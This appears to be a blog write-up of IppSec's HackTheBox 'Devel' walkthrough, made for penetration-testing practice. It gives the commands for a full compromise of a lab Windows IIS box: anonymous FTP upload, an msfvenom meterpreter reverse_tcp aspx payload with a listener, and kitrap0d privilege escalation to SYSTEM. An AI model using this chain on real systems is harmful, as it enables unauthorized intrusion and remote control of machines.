Devel Hackthebox

Disassembly of IppSec’s youtube video HackTheBox - Devel. Windows box which is completely done within metasploit and the standard commands you would use to enumerate a box and interact. Great metasploit refresher.


Legal Usage: The information provided by execute@will is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.


This series of write-up will contain comprehensive write-ups of hackthebox machines. In an effort to sharpen reporting techniques and help solidify the understand and methodologies used during penetration testing.

Enumeration

nmap scan:

1
nmap -sC -sV -oA nmap 10.10.10.5

(results)

FTP is open which is interesting and normal http is quite normal

The default login page exists for IIS, further investigating the image file name we see its labeled “welcome.png” which is a file name that was enumerated in the FTP

checking out the /isstart.htm which is the main index page:

the HTTP server is most likely in the same directory as the FTP server.

ftp to open port

1
2
3
ftp 10.10.10.5
username: anonymous
password: anything

create a test file locally

1
echo ippsec > test

“put” file on the ftp

1
put test

file uploaded successfully to the ftp server.

viewing uploaded file

Noticing that when the file is accessed via the web-server if the file name doesn’t have an extension the server gives a 404 error.

if the test extention is changed to an test.html a 200 response is returned.

1
mv test test.html

upload

1
put test.html

returns the 200 response an displays the text.html

Burp Suite

Keep in mind that IIS servers do execute code normally .asp or .aspx file extentions.

intercept request with burp

intercepted request sent over to repeater (ctrl+r)

web server is report IIS 7.5

which is Windows 7 and Windows Server 2008 R2. Thought process is that *.asp* is based off VBS and .aspx is based off .NET Framework, which is more likely in this case.

msfvenom

1
msfvenom -h

flags that will be used: -p = payload -f = format -o = output

list msfvenom payloads

1
msfvenom -l | grep windows

being cognizant of the type of payload chosen as 32-bit and 64-bit do not match.

list msfvenom formats

1
msfvenom --help-formats

setup payload

1
msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o ippsec.aspx

This created an aspx file that will load meterpreter

viewing file created:

1
less ippsec.aspx

referred to as the magic!

upload payload

on the FTP server

1
1
put ippsec.aspx

load msfconsole/listener

1
2
msfdb run # first time run and starts postgress server
msfconsole # normal way without postgress server

1
2
use exploit/multi/handler
show options

set payload:

1
2
set payload windows/meterpreter/reverse_tcp # what was chosen on msfvenom
show options

set LHOST to local ip address

1
2
set LHOST tun0 # or adapter name
run

recreating payload with host/port

when the payload was created without the LHOST and LPORT

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.17 LPORT=4444 -f aspx -o ippsec.aspx

re-upload to ftp server

1
1
put ippsec.aspx

response:

interpreter shell connection was created.

Metasploit interaction with shell

To interact with shell

1
sessions -i 1

first step:

1
sysinfo

check architecture check which is an x86

1
2
shell
systeminfo # inside of shell

normally would say the hotfixes installed but in this case it says N/A which could mean this machine has never been updated. Keep in mide the boot time, and Service Pack

metasploit exploit suggester

background current shell and search for suggest

1
search suggest

use local_exploit_suggester

1
2
use post/multi/recon/local_exploit_suggester
show options

set session to current session:

1
set SESSION 1

1
1
run

since this box hasn’t been updated since release with a release date of 2009 selecting any of the returned vulnerable exploits might work.

Choosing the first exploit ms10-015 kitrap0d

1
2
use exploit/windows/local/ms10_015_kitrap0d
show options

1
2
set SESSION 1
show options # second time to verify that the session was added.

1
1
run

since we didnt set a payload metasploit opted to use *windows/meterpreter/reverse_tcp* which is not configured correctly to the LHOST and LPORT

1
2
set LHOST 10.10.14.17
run

an error occured and the box crashed so he re did all the step to this point and re-ran the exploit

connect to shell

1
2
shell
whoami

operating at nt authority/system!

#HAILippsec


If you don’t know who IppSec is check him out at:

Youtube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA Twitter: https://twitter.com/ippsec